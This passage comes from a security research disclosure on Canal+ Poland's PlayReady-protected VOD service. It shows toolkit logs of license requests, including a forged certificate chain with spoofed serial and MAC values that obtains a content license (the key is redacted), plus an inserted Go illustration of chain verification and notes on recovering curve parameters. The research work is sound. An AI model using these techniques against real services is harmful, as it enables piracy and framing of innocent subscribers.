Finally, it is worth mentioning that the manifest file for 4K content could be accessed too, but since it is slightly different from the ISM files (`.mpd` DASH files), at this phase of the research it was not possible to check whether acquiring a license to 4K content was possible:

```
msprcp> assetinfo -A ctitzm4567954
TVOD ASSET
id: ctitzm4567954
title: Pan T. (4K)
title_original: PAN T.
allow: 31.12.2022
year: 2019
duration: 101 min
price: 9.99 PLN
vat: 23
url: http://r.cdn-ncplus.pl/vmp-ncplusgo04-voddashdrm/UHD_21024918/UHD_21024918.mpd
```

However, a different check was conducted instead. The security level of the client device cert was raised to `SL3000` (the level expected of devices authorized to play 4K content) and an attempt was made to obtain a license to a non-4K asset. This is illustrated by the log below:

```
msprcp> set SECLEVEL SL3000
msprcp> devcert
generating new cert, device changed or not initialized
### CERT
- random
0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4  ..|.d...L.......
- seclevel 3000
- uniqueid
0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38  ,$..C..30A4072D8
- pubkey_sign
0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24  .4S.h.O..<..-..$
0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad  ....km)..q....x.
0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00  w7^.......y.....
0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1  ...0..36........
- pubkey_enc
0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef  ..&._..L.sMv....
0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df  {I,....Q.oTXl...
0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69  ..l.)..tu....d.i
0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d  .....f......p...
- digest
0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9  ........^.JXZ...
0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2  .z..."G..E..<bm.
msprcp> maninfo -A ctitmim568003
- downloading manifest
MANIFEST: content\ctitmim568003\Manifest.ism
SmoothStreamingMedia
MajorVersion: 2
MinorVersion: 0
TimeScale: 10000000
Duration: 47820400000 [1h 19m 3642s]
ProtectionHeader
SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95
WRMHEADER
keylen: 16
algid: AESCTR
kid
0000: 04 d4 55 6e 65 f9 57 47 a3 04 f9 34 09 14 67 78  ..Une.WG...4..gx
la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx
ds_id:
0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95  y...@..B...[.._.
StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 2391 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125436 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 2392 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 MaxHeight: 720 msprcp> getlicense -A ctitmim568003 - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... 
nonce
0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34  mQ(*.....4/...E4
NONCE
bVEoKtjFGqfMNC8DHIlFNA==
KEYDATA
/3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A=
CIPHERDATA
...
XML DIGEST
OFYxtpcMsG0kr8YN5/7WvN4ChEORGK2d2/09JpEtWX4=
ecdsa digest
0000: 04 95 66 ba b0 e5 e0 69 13 02 bb de 69 60 61 d5  ..f....i....i.a.
0010: 46 cb c5 1a 3f e3 65 89 c2 65 f2 71 2e 98 fc 11  F...?.e..e.q....
signature
- r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6
- s: 8b771e1097c703f3dc66be965869ed4a61b1c03e496ed5a132896f7e67a0e5f3
XML SIGNATURE
J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqaLdx4Ql8cD89xmvpZYae1KYbHAPklu1aEyiW9+Z6Dl8w==
PUBKEY
HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ==
- sending license req to: https://lsp1.ncplus.pl/kms/proxy
error: cannot get license, see [content\ctitmim568003\debug\lic_resp.txt] for information
```

This test failed, which likely means that either the security level of the whole cert chain is verified at the license server side, or that the request (or protocol) used by such devices is different.

### SCENARIO 6 (AN ATTEMPT TO USE A FAKE CERT CHAIN)

The integrity of the certificate chain used for device identity is protected by ECC signatures. Each cert in the chain carries a signature computed over the `SHA256` digest of the certificate data. The public part of the ECC key against which the signature should be verified is attached at the end of the certificate data (past the signature). A verifier that takes the signing key from the certificate it is checking only establishes that the chain is self-consistent; the chain proves nothing about the device unless verification terminates at a root key the license server trusts independently of the chain. This creates the potential of building a custom certificate chain (with a custom Microsoft PlayReady root certificate). A test of this possibility has been implemented (`MSPR_FAKE_ROOT` variable).
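To make the point about the embedded verification key concrete, here is an added Go example (my illustration, not the toolkit's code and not the real PlayReady certificate layout): a toy chain in which each cert carries an ECDSA P-256 signature over SHA-256 of its body and the signer's public key appended after it, checked once by a verifier that trusts the embedded key and once by a verifier that pins the root. All key material and identifiers are generated or invented at run time.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
	"math/big"
)

// Cert is a toy certificate shaped after the description above: a body
// (security level, unique id, subject signing key), an ECDSA signature over
// SHA-256(body) made by the issuer, and the issuer's public key appended
// past the signature. It is NOT the real PlayReady certificate format.
type Cert struct {
	SecLevel  uint32
	UniqueID  [16]byte
	PubSign   [64]byte // subject's P-256 key as X||Y, like the pubkey_sign dumps
	Sig       []byte   // ASN.1 ECDSA signature made by the issuer
	IssuerPub [64]byte // key the verifier is invited to check Sig with
}

func encodePub(pub *ecdsa.PublicKey) (out [64]byte) {
	pub.X.FillBytes(out[:32])
	pub.Y.FillBytes(out[32:])
	return out
}

func decodePub(raw [64]byte) *ecdsa.PublicKey {
	return &ecdsa.PublicKey{Curve: elliptic.P256(),
		X: new(big.Int).SetBytes(raw[:32]), Y: new(big.Int).SetBytes(raw[32:])}
}

func (c *Cert) body() []byte {
	var lvl [4]byte
	binary.BigEndian.PutUint32(lvl[:], c.SecLevel)
	return append(append(lvl[:], c.UniqueID[:]...), c.PubSign[:]...)
}

func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// issue signs a cert for subject with the issuer key and embeds the issuer's
// public key after the signature, as described for the real chain.
func issue(subject *ecdsa.PublicKey, level uint32, id string, issuer *ecdsa.PrivateKey) *Cert {
	c := &Cert{SecLevel: level, PubSign: encodePub(subject), IssuerPub: encodePub(&issuer.PublicKey)}
	copy(c.UniqueID[:], id)
	h := sha256.Sum256(c.body())
	sig, err := ecdsa.SignASN1(rand.Reader, issuer, h[:])
	if err != nil {
		panic(err)
	}
	c.Sig = sig
	return c
}

// VerifySelfContained checks every signature against the key the cert itself
// carries. It only proves the chain is self-consistent: anyone who generates
// their own root key can produce a chain that passes.
func VerifySelfContained(chain []*Cert) bool {
	for _, c := range chain {
		h := sha256.Sum256(c.body())
		if !ecdsa.VerifyASN1(decodePub(c.IssuerPub), h[:], c.Sig) {
			return false
		}
	}
	return true
}

// VerifyPinned additionally requires that each cert was signed by the next
// one's subject key and that the last one was signed by the pinned root.
func VerifyPinned(chain []*Cert, pinnedRoot [64]byte) error {
	if !VerifySelfContained(chain) {
		return errors.New("signature check failed")
	}
	for i, c := range chain {
		expect := pinnedRoot
		if i+1 < len(chain) {
			expect = chain[i+1].PubSign
		}
		if !bytes.Equal(c.IssuerPub[:], expect[:]) {
			return fmt.Errorf("cert %d was not signed by its expected issuer", i)
		}
	}
	return nil
}

// BuildChain issues a device (leaf) cert under a group/model cert that is in
// turn issued by root; the chain is ordered [device, group].
func BuildChain(root *ecdsa.PrivateKey, level uint32) []*Cert {
	group, device := newKey(), newKey()
	return []*Cert{
		issue(&device.PublicKey, level, "DGBD0123456789AB", group),
		issue(&group.PublicKey, level, "GROUP-STB-MODEL", root),
	}
}

type Outcome struct{ GenuineSelf, GenuinePinned, FakeSelf, FakePinned bool }

// Demo compares a chain rooted at the key the verifier trusts with one rooted
// at an attacker's key, which can claim any security level it likes.
func Demo() Outcome {
	trustedRoot, attackerRoot := newKey(), newKey()
	pin := encodePub(&trustedRoot.PublicKey)
	genuine, fake := BuildChain(trustedRoot, 2000), BuildChain(attackerRoot, 3000)
	return Outcome{VerifySelfContained(genuine), VerifyPinned(genuine, pin) == nil,
		VerifySelfContained(fake), VerifyPinned(fake, pin) == nil}
}

func main() {
	fmt.Printf("%+v\n", Demo()) // {GenuineSelf:true GenuinePinned:true FakeSelf:true FakePinned:false}
}
```

The self-contained check accepts the attacker's chain because every signature really does verify under the key sitting next to it; only the pinned check notices that the group cert was not signed by the trusted root.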
A sample fake certificate chain can be seen below: ``` msprcp> set MSPR_FAKE_ROOT 1 msprcp> devchain generating new cert, device changed or not initialized CERT CHAIN: null ### CERT - random 0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4 ..|.d...L....... - seclevel 2000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24 .4S.h.O..<..-..$ 0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad ....km)..q....x. 0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00 w7^.......y..... 0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1 ...0..36........ - pubkey_enc 0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef ..&._..L.sMv.... 0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df {I,....Q.oTXl... 0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69 ..l.)..tu....d.i 0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d .....f......p... - digest 0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9 ........^.JXZ... 0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2 .z..."G..E.. maninfo -A ctitmim597698 - downloading manifest MANIFEST: content\ctitmim597698\Manifest.ism SmoothStreamingMedia MajorVersion: 2 MinorVersion: 0 TimeScale: 10000000 Duration: 36440533334 [1h 0m 3644s] ProtectionHeader SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95 WRMHEADER keylen: 16 algid: AESCTR kid 0000: e6 3f 5a 69 2f 8d 49 4b 86 20 17 43 3b 13 b7 ca .?Zi/.IK...C;... la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. 
StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 1823 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125434 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 1823 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 MaxHeight: 720 msprcp> set SERIAL DGBD0123456789ABC msprcp> set MAC AABBCCDDEEFF msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: be e2 7c bf 64 aa c0 c9 4c d6 0f f2 8a 05 e1 b4 ..|.d...L....... - seclevel 2000 - uniqueid 0000: ee fc 8e 99 43 de ce 32 33 41 34 35 36 37 44 38 ....C..23A4567D8 - pubkey_sign 0000: 1f 34 53 e7 68 e2 4f 0a 86 3c 02 60 2d 17 e4 24 .4S.h.O..<..-..$ 0010: cf 12 8f 96 6b 6d 29 a7 be 71 f1 14 89 e5 78 ad ....km)..q....x. 0020: 77 37 5e fe ba e9 93 f1 bb f3 79 b2 7f 1e 08 00 w7^.......y..... 
0030: 86 fd 1b 30 e4 cf 33 36 82 cc a2 e2 b8 ef 9c a1 ...0..36........ - pubkey_enc 0000: d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 c8 10 ac ef ..&._..L.sMv.... 0010: 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 6c bf be df {I,....Q.oTXl... 0020: ea a2 6c f7 29 cc 0f 74 75 d2 20 bd cf 64 fa 69 ..l.)..tu....d.i 0030: fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 70 df ca 0d .....f......p... - digest 0000: ad 80 a5 d2 03 9d de e5 5e ea 4a 58 5a c9 e3 c9 ........^.JXZ... 0010: 9f 7a df c6 d9 22 47 cf 9f 45 ae a9 3c 62 6d e2 .z..."G..E.. getlicense -A ctitmim597698 - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST BuFDPnPrqUbmF/GYrt6mJELuauILzEqBgbf194KVWfs= ecdsa digest 0000: 88 6f a0 93 d6 48 0a 5e b5 20 18 43 62 fc 23 af .o...H.^...Cb.#. 0010: 2b c4 50 ed ea cf 13 cd 55 5d 37 04 d0 ea 1c 99 +.P.....U]7..... 
signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: efbad841225aef654af8c59aa593085eb25dddd39e9566643b08935aaca2813d XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqbvuthBIlrvZUr4xZqlkwhesl3d056VZmQ7CJNarKKBPQ== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T10:36:38.0130303 ExpirationDate: 2022-07-21T10:36:38.0130303 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: e6 3f 5a 69 2f 8d 49 4b 86 20 17 43 3b 13 b7 ca .?Zi/.IK...C;... v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: 73 43 41 d1 29 3c e4 21 24 a2 27 a3 2f 6c 42 7d sCA.)<.!$.'./lB} 0010: 8f 85 66 70 36 64 34 62 9b e7 9c f6 b7 cf e2 18 ..fp6d4b........ 0020: 59 f5 5a 26 8b 43 f3 26 ee ec cf 39 f7 f5 e4 82 Y.Z&.C.&...9.... 0030: 39 29 4f 23 55 2d 71 b5 99 76 d9 5a 3b 40 01 32 9)O#U-q..v.Z;@.2 0040: 09 2b f4 eb eb e7 42 e6 c3 60 08 1a 2c f0 91 4b .+....B.....,..K 0050: a0 4c 9e 79 71 bd 38 b6 d6 5e 68 ca 85 48 d7 75 .L.yq.8..^h..H.u 0060: b6 21 d1 08 e5 3a 88 1c a6 de b1 15 01 47 a3 a5 .!...:.......G.. 0070: bc fc 5a de 94 65 36 f3 5a f4 fe 77 c9 6f c2 b2 ..Z..e6.Z..w.o.. attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 
0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5  .d.i.....f......
0040: 70 df ca 0d                                      p...
attr: 000b Signature
data
0000: 00 01 00 10 48 f1 2b cd 5c b9 47 c4 a9 2b 8b b8  ....H.+...G..+..
0010: 2f c7 dd 83                                      /...
content_key
0000: *REMOVED*
```

It is also worth mentioning that new crypto values are generated on each toolkit run:

```
c:\_TRANSFER\MSPRNCP\toolkit>shell
# MS Play Ready / Canal+ VOD toolkit
# (c) Security Explorations 2016-2019 Poland
# (c) AG Security Research 2019-2022 Poland
loaded cdn [CDN helper]
loaded mspr [MS Play Ready toolkit]
loaded vod [CANALP VOD toolkit]
loaded cgaweb [CANALP CGAWeb toolkit]
msprcp> devcert
generating new cert, device changed or not initialized
### CERT
- random
0000: e2 10 76 85 6e 63 b9 09 f7 a1 26 68 14 48 66 1e  ..v.nc....&h.Hf.
- seclevel 2000
- uniqueid
0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38  ,$..C..30A4072D8
- pubkey_sign
0000: 3c 6a 53 7d 10 29 d4 05 98 33 33 3e 5f 89 2e 76  <jS}.)...33>_..v
0010: c0 bb 64 56 6d c4 af 72 91 87 98 50 c6 08 d7 df  ..dVm..r...P....
0020: 74 29 45 2c 23 e5 bb 7d b1 83 cd 71 4a ae f6 99  t)E,#..}...qJ...
0030: 59 9d a5 d6 98 f4 e4 c6 79 ee 90 35 73 39 08 d8  Y.......y..5s9..
- pubkey_enc
0000: 8c f6 5a 18 44 2f 21 54 84 d7 32 f8 fe e1 70 7e  ..Z.D/!T..2...p.
0010: 2e d2 99 bf 5b bd 95 d7 68 bb 9d 89 e4 04 ae f4  ....[...h.......
0020: de be 27 d4 be 5d ae a9 f1 83 ad 4e 1d ea 18 fd  ..'..].....N....
0030: 45 49 7f ee 1a 96 d1 c5 47 3a bf ac 21 c2 5b dc  EI......G:..!.[.
- digest
0000: 89 54 83 48 13 3b 36 68 07 5a 74 0d 45 a0 46 3b  .T.H.;6h.Zt.E.F;
0010: 8b 0f e7 37 e6 f7 e6 42 99 4a 3b a2 11 0b 89 9f  ...7...B.J;.....
- signkey
0000: ae 51 7c 73 44 23 eb 9b 5b 06 3d 5c 3a 20 63 60  .Q|sD#..[.=.:.c`
0010: cf 93 b3 8a a0 52 b7 3c c7 22 cf 9b 54 ab 0d 58  .....R.<."..T..X
0020: 2e b5 56 fa c8 ed 83 28 8f 3b 91 4d 85 2d 29 1c  ..V....(.;.M.-).
0030: f2 34 1b f4 ae d8 21 57 64 8b 64 ab 27 69 85 62 .4....!Wd.d.'i.b msprcp> exit c:\_TRANSFER\MSPRNCP\toolkit>shell # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland loaded cdn [CDN helper] loaded mspr [MS Play Ready toolkit] loaded vod [CANALP VOD toolkit] loaded cgaweb [CANALP CGAWeb toolkit] msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: eb e5 32 60 06 21 89 1b a0 a3 93 52 f6 e7 12 e2 ..2..!.....R.... - seclevel 2000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: f2 03 7f 05 3b 7e 24 94 2b 50 02 4f 92 20 17 33 ....;.$.+P.O...3 0010: 15 3c 23 70 1e aa fe 27 95 38 0a f4 03 e8 91 ba .<#p...'.8...... 0020: b5 73 44 3f 4d 52 42 e8 e6 cd 91 65 c2 1c d5 a7 .sD?MRB....e.... 0030: b7 34 5a aa 1c 6f 63 31 ce 97 35 8a 10 c2 47 7d .4Z..oc1..5...G} - pubkey_enc 0000: 0f 89 99 cd b3 4f 0d 89 b1 bd d2 47 13 b1 31 1d .....O.....G..1. 0010: 3d 08 32 9c e1 83 85 25 ff 7b be 6e 1c 3b 8e ce =.2....%.{.n.;.. 0020: c1 72 64 d0 b7 f8 78 0c 7c d2 0a 37 9f ec 14 2d .rd...x.|..7...- 0030: a2 b4 33 da 2a a5 ff 54 e8 ee b6 c7 c5 db 0b 3a ..3.*..T.......: - digest 0000: d7 d0 01 8d 2d 83 6d 48 12 7d 79 4c 15 e6 68 5c ....-.mH.}yL..h. 0010: ab 65 61 30 b5 dc 68 e5 f5 71 f7 41 6f d8 99 23 .ea0..h..q.Ao..# - signkey 0000: ae 51 7c 73 44 23 eb 9b 5b 06 3d 5c 3a 20 63 60 .Q|sD#..[.=.:.c. 0010: cf 93 b3 8a a0 52 b7 3c c7 22 cf 9b 54 ab 0d 58 .....R.<."..T..X 0020: 2e b5 56 fa c8 ed 83 28 8f 3b 91 4d 85 2d 29 1c ..V....(.;.M.-). 0030: f2 34 1b f4 ae d8 21 57 64 8b 64 ab 27 69 85 62 .4....!Wd.d.'i.b msprcp> ``` The above along `SERIAL` and `MAC` value change can make attribution hard. ## SOME THOUGHTS Below, some thoughts are given on the topics that triggered my attention over the course of this research. ### REAL CDN URLs VOD platform should not reveal URLs of content. 
The URLs should be generated at random by the license server (and be valid for a limited time period) and returned to the requesting entity only if the license for the content was granted. In the Microsoft PlayReady case, the license is acquired for the KID, not the URL. The license request embeds the WRM header, which carries the relevant information. This behavior is likely due to the fact that the CDN is not synced with the license server, or that PlayReady does not care about content at all, as its work is limited to key identifiers (KIDs). There is no reason to reveal the actual URL of content. This work is a good demonstration of the risk associated with content URL leaks, as:

1) the attacker can copy the DB of content (understood as links to manifest files),
2) the attacker can issue license requests for KIDs associated with harvested manifest files in order to obtain plaintext content keys,
3) the attacker can begin downloading fragments from the CDN network.

IMHO access to content keys and CDN URLs should be treated in the same way. There are two pieces of the puzzle. Access to a content key should imply the ability to download and decrypt content. Giving access to download content gives an advantage to the attacker. I see the potential (and risks) associated with the following:

- whole CDN content gets downloaded (without keys, the download could be performed in a distributed manner, by a group of attackers located in different geographical regions),
- the attacker(s) now just need the keys to "unlock" the content (much less data).

### DIFFICULT ATTRIBUTION

The MS PlayReady certificate is generated dynamically for a client device with the use of a group cert (common to all devices of the same model). This implies the risk of secrets theft (PlayReady group cert and key) from one device only. It also implies no knowledge of which subscriber makes use of the stolen secrets and relies on a fake identity for malicious purposes.
This makes attribution harder too, as the attacker can easily spoof the identity of other, innocent users (the STB serial and MAC are sufficient for that; these data can be acquired in a store where CANAL+ STBs are sold). In that context, the PlayReady certificate should be tied to a HW secret. All CANAL+ set-top-boxes contain the functionality to pair the STB with a smart card. The pairing relies on a HW secret (the SCK key for ST chipset based devices). The very same SCK key should be used for client device certificate generation, for the purpose of:

- verifying the device identity at the time of a license request (response to a challenge, or an HMAC in the cert),
- tracking clients that request licenses in an unusual manner (from different IP addresses, too many license requests in a given time period).

The device certificate pairing could be completed with the use of an HMAC (AES CBC relying on a unique chip secret key). Finally, it is worth mentioning that attribution gets especially hard when vulnerabilities are present in target STB devices. This is the case for CANAL+ boxes (3 years old bugs).

### NO TIME LIMITED CERT

It is worth mentioning that there is no time (certificate validity time) attribute in the device cert. This implies that device certs stay valid for the lifetime of the signing cert (until the signing group cert is revoked / changed).

### DENIAL OF SERVICE ATTACK (DOS)

A DOS attack against the license server is likely sufficient to take down the VOD platform. If the license server is unavailable, most of the content cannot be played.

### LITTLE REVERSE ENGINEERING OBSTACLES

Reversing MS Play Ready could be successfully performed as:

- multiple symbol names were left in the binary,
- the binary did not contain any reverse engineering countermeasures such as code obfuscation, etc.

MS PlayReady functionality was implemented at the application layer too. This implied no need to break the security of the kernel or HW chip (which could be done btw.).
While the private group key and group certificates were embedded in the binary in encrypted form, their plaintext content could be retrieved at runtime with the help of the user level API too (access to the encrypted file system).

The ECC curve parameters were embedded in the binary in a non-standard way (affine transformation to MOD space). All calculations were conducted with respect to that transformation too (and with certain optimizations such as the Montgomery ladder). Yet, this was not an obstacle once the fundamentals of ECC cryptography were acquired. The crucial weak point was the P256 symbol and the subroutine verifying whether a given point is on the curve. This subroutine indirectly leaked the curve params (and type).

The ECC formula for the NIST P-256 curve is the following:

```
Y^2 = X^3 + A*x + B
```

This formula can be used to check whether a given point (X,Y) lies on the ECC curve. For points transformed to the MOD space:

```
Y = y*F
X = x*F
```

This yields the following:

```
(y*F)^2 = (x*F)^3 + A*x + B
y^2 * F^2 = x^3 * F^3 + A*x + B
// multiplying by F^-1 (the inverse)
y^2 * F^2 * F^-1 = x^3 * F^3 * F^-1 + A*x*F^-1 + B*F^-1
y^2 * F^2 * F^-1 = x^3 * F^3 * F^-1 + (A*F^-1)*x + B*F^-1
```

which yields the curve params used for points transformed to MOD space:

```
real_a = A*F^-1
real_b = B*F^-1
```

The above was verified with the use of the code from the `reversing\curve_params` directory:

```
p: ffffffff00000001000000000000000000000000ffffffffffffffffffffffff
a: fffffffc00000004000000000000000000000003fffffffffffffffffffffffc
b: dc30061d04874834e5a220abf7212ed6acf005cd78843090d89cdf6229c4bddf
x: c8b6af16ee941aadaa5389b4af2c10e356be42af175ef3face93254e7b0b3d9b
y: 982b27b5cb2341326e56aa857dbfd5c634ce2cf9ea74fca8f2af5957efeea562
X to_point: d9279a1bdded5008c68c131bba13693a3d31ed60c7ee32fd527b4ecaacc6af7
Y to_point: ad1672971d78becdebdbd582c62bebc858a989944d9e16348dbf6cccf6961043
x_pow_2: c5b95a01aa4050357c63f9fdb5d4a90fc4fe0a1e0d5f2ceace9e0292973e2466
x_pow_2_plus_a: c5b959feaa4050387c63f9fdb5d4a90fc4fe0a210d5f2ceace9e0292973e246
x_pow_3_plus_ax: adc225c0905f9b67beda4c215af7abe97b4c373975655b44beb446b349a9cf8
x_pow_3_plus_ax_plus_b: 89f22bde94e6e39ba47c6ccd5218dac0283c3d05ede98bd59751261736e8dc8
